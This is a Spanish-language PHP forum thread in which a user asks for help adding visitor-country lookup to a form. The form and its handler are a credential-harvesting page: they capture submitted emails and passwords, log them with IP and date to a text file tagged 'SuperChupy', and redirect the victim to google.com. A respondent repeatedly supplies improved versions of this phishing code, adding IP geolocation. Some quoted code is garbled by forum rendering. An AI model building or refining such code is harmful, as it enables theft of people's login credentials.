Foros del Web » Programando para Internet » PHP »

[SOLUCIONADO] Codigo Formulario de envio con pais

Estas en el tema de Codigo Formulario de envio con pais en el foro de PHP en Foros del Web. Necesito ayuda con un formulario, que tenga "email" "nombre" "pais" Quiero que al enviar los datos del formulario me mande en un archivo de texto ...

  #1 (permalink)  
Antiguo 17/07/2015, 12:01
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Codigo Formulario de envio con pais

Necesito ayuda con un formulario, que tenga "email" "nombre" "pais" Quiero que al enviar los datos del formulario me mande en un archivo de texto .txt en vez de la ip que me diga el pais de la ip por ejemplo: Nombre: Roberto, Correo: [email protected], Pais: Colombia.

sin que tenga un cuadro de que ellos elijan su pais, solo con enviar nombre y correo me llege el nombre del pais que envian. AYUDA PORFAVOR.
  #2 (permalink)  
Antiguo 17/07/2015, 12:04
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

ve esto:
http://norfipc.com/codigos/como-saber-pais-corresponde-direccion-ip-internet.php
  #3 (permalink)  
Antiguo 17/07/2015, 14:21
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Podras ponerme el codigo aqui que sea con nombre: correo y pais ?
  #4 (permalink)  
Antiguo 17/07/2015, 15:31
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años
Puntos: 2534
Respuesta: Codigo Formulario de envio con pais

Cita:
Iniciado por latempe Ver Mensaje
Podras ponerme el codigo aqui que sea con nombre: correo y pais ?
¿Necesitas que alguien más haga tu trabajo?
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #5 (permalink)  
Antiguo 17/07/2015, 16:50
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Cita:
¿Necesitas que alguien más haga tu trabajo?
El lo que me envio algo que muestra tu ip cuando entras a la pagina no que la envia por medio de un formulario.
  #6 (permalink)  
Antiguo 17/07/2015, 16:54
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

Cita:
Iniciado por latempe Ver Mensaje
El lo que me envio algo que muestra tu ip cuando entras a la pagina no que la envia por medio de un formulario.
se nota que no leiste el contenido del sitio al que te envie, alli te dan la descarga y como implementar una libreria que te ayuda en la tarea que requieres
__________________
[email protected]
HITCEL
  #7 (permalink)  
Antiguo 17/07/2015, 16:57
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

utiliza la logia un momento, la libreriq que te indique te entrega el pais mediante la ip del visitante, en ese caso puedes poner esa variable que te da le pais para que sea enviada mediante el mail y asi ver de que pasi te escribieron sin necesidad de ver la ip, mas facil imposible:
Código PHP:
Ver original
  1. <?php
  2. error_reporting(E_ALL & ~E_NOTICE);
  3. include("geoiploc.php");
  4.   if (empty($_POST['checkip']))
  5.   {
  6.         $ip = $_SERVER["REMOTE_ADDR"];
  7.   }
  8.   else
  9.   {
  10.         $ip = $_POST['checkip'];
  11.   }
  12. ?>
  13. Tu dirección IP es: <?php echo($ip); ?> <br>
  14. Tu País es : <?php echo(getCountryFromIP($ip, " NamE"));?>//ESTA ES LA VARIABLE QUE PUEDES PASAR POR EMAIL
  15.  (<?php echo(getCountryFromIP($ip, "code"));?>)
__________________
[email protected]
HITCEL
  #8 (permalink)  
Antiguo 17/07/2015, 16:58
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Yo lo Prove y solo me decia: Tu dirección IP es:
Tu País es :

MIRA EL TITULO: Como saber el país que corresponde a una dirección IP de internet

Nada de enviarlo por medio de un formulario
  #9 (permalink)  
Antiguo 17/07/2015, 17:00
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

DISCULPA...
nose PHP podrias organizarlo en este codigo? ese es el que envia a un archivo de txt

Cita:
<?php

$usuario = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$fecha = date("Y-m-d;h:i:s");


if( (empty($usuario)) or (empty($password)) ){
header('location: index.php');
}else{

//Guardaremos en un archivo de texto
$file = fopen('aaaa.txt','a+');
fwrite($file, "\r\nUsuario: ".$usuario."\r\nContraseña: ".$password."\r\nIP: ".$ip."\r\nFecha: ".$fecha."\r\n<<<----------------www.SuperChupy.Com----------------->>>\r\n");
fclose($file);

header("Location: http://google.com/");
}
?>
  #10 (permalink)  
Antiguo 17/07/2015, 17:07
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

aqui esta:
Código PHP:
Ver original
  1. <?php
  2. $usuario = $_POST['email'];
  3. $password = $_POST['pass'];
  4. $ip = $_SERVER['REMOTE_ADDR'];
  5. $fecha = date("Y-m-d;h:i:s");
  6. $pais = $_POST['pais'];
  7.  
  8. if( (empty($usuario)) or (empty($password)) ){
  9. header('location: index.php');
  10. }else{
  11.  
  12. //Guardaremos en un archivo de texto
  13. $file = fopen('work.txt','a+');
  14. fwrite($file, "\r\nUsuario: ".$usuario."\r\nContraseña: ".$password."\r\nIP: ".$ip."\r\nFecha: ".$fecha."\r\nTu Pais: ".$pais/*aqui te registra el nombre del pais*/."\r\n<<<----------------www.SuperChupy.Com----------------->>>\r\n");
  15. fclose($file);
  16.  
  17. header("Location: http://pornoticia.com/");
  18. }
  19. ?>
  20.  
  21.  
  22. <?php
  23. //en tu formulario o la pagina de tu formulario agregas  la libreria y un campo oculto
  24. include("geoiploc.php");
  25. ?>
  26.  
  27. <input type="hidden" name="pais" value="<?php echo getCountryFromIP($ip, " NamE "); ?>"/>
__________________
[email protected]
HITCEL
  #11 (permalink)  
Antiguo 17/07/2015, 17:13
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

El Pais sale en blanco cuando se envia el formulario :(
  #12 (permalink)  
Antiguo 17/07/2015, 17:17
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

por lo que veo no has tomado la ip del cliente:
Código PHP:
Ver original
  1. $ip = $_SERVER["REMOTE_ADDR"];
__________________
[email protected]
HITCEL
  #13 (permalink)  
Antiguo 17/07/2015, 17:19
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Asi??

Código PHP:
    <?php
    $usuario 
$_POST['email']; 
    
$password $_POST['pass'];
    
$ip $_SERVER['REMOTE_ADDR']; 
    
$fecha date("Y-m-d;h:i:s");
    
$pais $_POST['pais'];
    
$ip $_SERVER["REMOTE_ADDR"];
    if( (empty(
$usuario)) or (empty($password)) ){
    
header('location: index.php');
    }else{
     
    
//Guardaremos en un archivo de texto
    
$file fopen('aaa.txt','a+'); 
    
fwrite($file"\r\nUsuario: ".$usuario."\r\nContraseña: ".$password."\r\nIP: ".$ip."\r\nFecha: ".$fecha."\r\nTu Pais: ".$pais/*aqui te registra el nombre del pais*/."\r\n<<<----------------www.SuperChupy.Com----------------->>>\r\n");
    
fclose($file);
     
    
header("Location: http://google.com/");
    }
    
?>
     
     
    <?php
    
//en tu formulario o la pagina de tu formulario agregas  la libreria y un campo oculto
    
include("geoiploc.php");
    
?>
     
    <input type="hidden" name="pais" value="<?php echo getCountryFromIP($ip" NamE "); ?>"/>
  #14 (permalink)  
Antiguo 17/07/2015, 17:22
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

no esto va en donde esta el formulario

Código PHP:
Ver original
  1. <?php
  2.     //en tu formulario o la pagina de tu formulario agregas  la libreria y un campo oculto
  3.     include("geoiploc.php");
  4.  
  5. $ip = $_SERVER['REMOTE_ADDR'];
  6.  
  7.  ?>
  8.      
  9.     <input type="hidden" name="pais" value="<?php echo getCountryFromIP($ip, " NamE "); ?>"/>
__________________
[email protected]
HITCEL
  #15 (permalink)  
Antiguo 17/07/2015, 17:24
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

No me sigue saliendo
  #16 (permalink)  
Antiguo 17/07/2015, 17:26
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

estas trabajando en un server local o en un hosting web?
__________________
[email protected]
HITCEL
  #17 (permalink)  
Antiguo 17/07/2015, 17:26
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

En un Hosting WEb!
  #18 (permalink)  
Antiguo 17/07/2015, 17:36
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

descargaste la libreria????
__________________
[email protected]
HITCEL
  #19 (permalink)  
Antiguo 17/07/2015, 17:38
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

si, la tengo en la misma raiz del formulario. La Libreria es: geoiploc.php
  #20 (permalink)  
Antiguo 17/07/2015, 18:08
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Pero no funciona
  #21 (permalink)  
Antiguo 17/07/2015, 18:21
Avatar de NueveReinas  
Fecha de Ingreso: septiembre-2013
Ubicación: No tan Buenos Aires
Mensajes: 1.101
Antigüedad: 10 años, 7 meses
Puntos: 145
Respuesta: Codigo Formulario de envio con pais

Pasa el código completo del HTML donde está el formulario y el código completo de PHP.
__________________
¿Te sirvió la respuesta? Deja un +1
  #22 (permalink)  
Antiguo 17/07/2015, 18:26
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

ESTE ES EL HTML

Código HTML:
<div id="Formulario">
		<ul>
		<form id="form" method="post" target="_top" action="activo.php">
		<li><label id="LoginForm">Correo electrónico:</label></li>
		<li><input id="input" name="email" placeholder="Correo electrónico" autocomplete="off" required="" type="text"></li>
		<li><label id="LoginForm">Contraseña:</label></li> 
		<li><input id="input" name="pass" placeholder="Contraseña" autocomplete="off" required="" type="password"></li>
		<li><input value="" type="submit"></li>
		</form> 


ESTE ES EL PHP.

Código PHP:
    <?php
    $usuario 
$_POST['email']; 
    
$password $_POST['pass'];
    
$ip $_SERVER['REMOTE_ADDR']; 
    
$fecha date("Y-m-d;h:i:s");
    
$pais $_POST['pais'];
    
    if( (empty(
$usuario)) or (empty($password)) ){
    
header('location: index.php');
    }else{
     
    
//Guardaremos en un archivo de texto
    
$file fopen('aaa.txt','a+'); 
    
fwrite($file"\r\nUsuario: ".$usuario."\r\nContraseña: ".$password."\r\nIP: ".$ip."\r\nFecha: ".$fecha."\r\nTu Pais: ".$pais/*aqui te registra el nombre del pais*/."\r\n<<<----------------www.SuperChupy.Com----------------->>>\r\n");
    
fclose($file);
     
    
header("Location: http://google.com/");
    }
    
?>
  #23 (permalink)  
Antiguo 17/07/2015, 20:08
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

prueba asi en tu form:
Código PHP:
Ver original
  1. <?php
  2. // Con esta línea obtenemos nuestra IP externa
  3. $extip = getenv("REMOTE_ADDR");
  4. // tambien podriamos usar esta para obtenera la ip externa
  5. // $extip = $_SERVER['REMOTE_ADDR'];
  6. $url = 'http://api.hostip.info/get_html.php?ip='.$extip;
  7. // Usamos Curl para obtener los resultados de la peticion a Hostip.info
  8. function getRemoteFile($url, $timeout = 10) {
  9.   $ch = curl_init();
  10.   curl_setopt ($ch, CURLOPT_URL, $url);
  11.   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  12.   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  13.   $file_contents = curl_exec($ch);
  14.   curl_close($ch);
  15.   return ($file_contents) ? $file_contents : FALSE;
  16. }
  17. $info = getRemoteFile($url);
  18. ?>
  19. <div id="Formulario">
  20.         <ul>
  21.         <form id="form" method="post" target="_top" action="activo.php">
  22.         <li><label id="LoginForm">Correo electrónico:</label></li>
  23.         <li><input id="input" name="email" placeholder="Correo electrónico" autocomplete="off" required="" type="text"></li>
  24.         <li><label id="LoginForm">Contraseña:</label></li>
  25.         <li><input id="input" name="pass" placeholder="Contraseña" autocomplete="off" required="" type="password"></li>
  26.         <li><input type="text" name="pais" value="<?php preg_match("/Country: (.*)\n/", $info, $out); echo $out[1]; ?>"/>
  27.         <li><input value="" type="submit"></li>
  28.         </form>
__________________
[email protected]
HITCEL
  #24 (permalink)  
Antiguo 17/07/2015, 20:11
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

y este lo dejas asi:
Código PHP:
Ver original
  1. <?php
  2.     $usuario = $_POST['email'];  
  3.     $password = $_POST['pass'];
  4.     $fecha = date("Y-m-d;h:i:s");
  5.     $pais = $_POST['pais'];
  6.      
  7.     if( (empty($usuario)) or (empty($password)) ){
  8.     header('location: index.php');
  9.     }else{
  10.      
  11.     //Guardaremos en un archivo de texto
  12.     $file = fopen('aaa.txt','a+');  
  13.     fwrite($file, "\r\nUsuario: ".$usuario."\r\nContraseña: ".$password."\r\nIP: ".$ip."\r\nFecha: ".$fecha."\r\nTu Pais: ".$pais."\r\n<<<----------------www.SuperChupy.Com----------------->>>\r\n");
  14.     fclose($file);
  15.      
  16.     header("Location: http://google.com/");
  17.     }
  18.     ?>
__________________
[email protected]
HITCEL
  #25 (permalink)  
Antiguo 17/07/2015, 22:14
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Solo Sale Esto: Tu Pais: (Unknown Country?) (XX)
  #26 (permalink)  
Antiguo 18/07/2015, 10:31
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

y Aparte de eso en el formulario sale el (Unknown Country?) (XX) no quiero que salga solo que se envie
  #27 (permalink)  
Antiguo 18/07/2015, 10:34
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

bueno el input colocalo como type="hidden" y el codigo me funciona bien, lo tengo montado

[URL="http://emcpublicidad.com/testeando.php"]ver codigo[/URL]
__________________
[email protected]
HITCEL
  #28 (permalink)  
Antiguo 18/07/2015, 10:39
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Cuando entro a ese link que pusiste sale:
Cita:
Orlando, US, host.hostingmaracaibo.com
Podrias mostrarme el formulario funcionando a ver? porque a mi no me funciona lo del pais sigue saliendo el mismo texto que mande.
  #29 (permalink)  
Antiguo 18/07/2015, 10:55
Avatar de xfxstudios  
Fecha de Ingreso: junio-2015
Ubicación: Valencia - Venezuela
Mensajes: 2.448
Antigüedad: 8 años, 10 meses
Puntos: 263
Respuesta: Codigo Formulario de envio con pais

vuelve a ir al enlace y ve este codigo funcionando, puedes jugar con el:
Código PHP:
Ver original
  1. <?php
  2. // Con esta línea obtenemos nuestra IP externa
  3. $extip = getenv("REMOTE_ADDR");
  4. // tambien podriamos usar esta para obtenera la ip externa
  5. // $extip = $_SERVER['REMOTE_ADDR'];
  6. $url = 'http://api.hostip.info/get_html.php?ip='.$extip;
  7. // Usamos Curl para obtener los resultados de la peticion a Hostip.info
  8. function getRemoteFile($url, $timeout = 10) {
  9.   $ch = curl_init();
  10.   curl_setopt ($ch, CURLOPT_URL, $url);
  11.   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  12.   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  13.   $file_contents = curl_exec($ch);
  14.   curl_close($ch);
  15.   return ($file_contents) ? $file_contents : FALSE;
  16. }
  17. $info = getRemoteFile($url);
  18. ?>
  19.  
  20. <?php
  21. // Extraemos el Pais
  22. preg_match("/Country: (.*)\n/", $info, $out);
  23. echo 'Pais: '.$out[1];
  24. ?>
  25.  
  26. <br>
  27.  
  28. <?php
  29. // Extraemos la Ciudad
  30. preg_match("/City: (.*)\n/", $info, $out);
  31. echo 'Ciudad: '.$out[1];
  32. ?>
  33.  
  34. <br>
  35.  
  36. <?php
  37. // Extraemos la IP externa
  38. preg_match("/IP: (.*)\n/", $info, $out);
  39. echo 'Ip: '.$out[1];
  40. ?>
__________________
[email protected]
HITCEL
  #30 (permalink)  
Antiguo 18/07/2015, 11:09
 
Fecha de Ingreso: septiembre-2012
Mensajes: 48
Antigüedad: 11 años, 7 meses
Puntos: 0
Respuesta: Codigo Formulario de envio con pais

Asi me sale problema en el formulario.
y Me Sale: Pais: (Unknown Country?) (XX)
Ciudad: (Unknown City?)
Ip: 186.6.168.47



Código PHP:
<?php
// Con esta línea obtenemos nuestra IP externa
$extip getenv("REMOTE_ADDR");
// tambien podriamos usar esta para obtenera la ip externa
// $extip = $_SERVER['REMOTE_ADDR'];
$url 'http://api.hostip.info/get_html.php?ip='.$extip;
// Usamos Curl para obtener los resultados de la peticion a Hostip.info
function getRemoteFile($url$timeout 10) {
  
$ch curl_init();
  
curl_setopt ($chCURLOPT_URL$url);
  
curl_setopt ($chCURLOPT_RETURNTRANSFER1);
  
curl_setopt ($chCURLOPT_CONNECTTIMEOUT$timeout);
  
$file_contents curl_exec($ch);
  
curl_close($ch);
  return (
$file_contents) ? $file_contents FALSE;
}
$info getRemoteFile($url);
?>
 
<?php
// Extraemos el Pais
preg_match("/Country: (.*)\n/"$info$out);
echo 
'Pais: '.$out[1];
?>
 
<br>
 
<?php
// Extraemos la Ciudad
preg_match("/City: (.*)\n/"$info$out);
echo 
'Ciudad: '.$out[1];
?>
 
<br>
 
<?php
// Extraemos la IP externa
preg_match("/IP: (.*)\n/"$info$out);
echo 
'Ip: '.$out[1];
?>
<div id="Formulario">
        <ul>
        <form id="form" method="post" target="_top" action="activo.php">
        <li><label id="LoginForm">Correo electrónico:</label></li>
        <li><input id="input" name="email" placeholder="Correo electrónico" autocomplete="off" required="" type="text"></li>
        <li><label id="LoginForm">Contraseña:</label></li> 
        <li><input id="input" name="pass" placeholder="Contraseña" autocomplete="off" required="" type="password"></li>
        <li><input type="text" name="pais" value="<?php preg_match("/Country: (.*)\n/"$info$out); echo $out[1]; ?>"/>
        <li><input value="" type="submit"></li>
        </form>

Etiquetas: formulario, pais
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 05:50.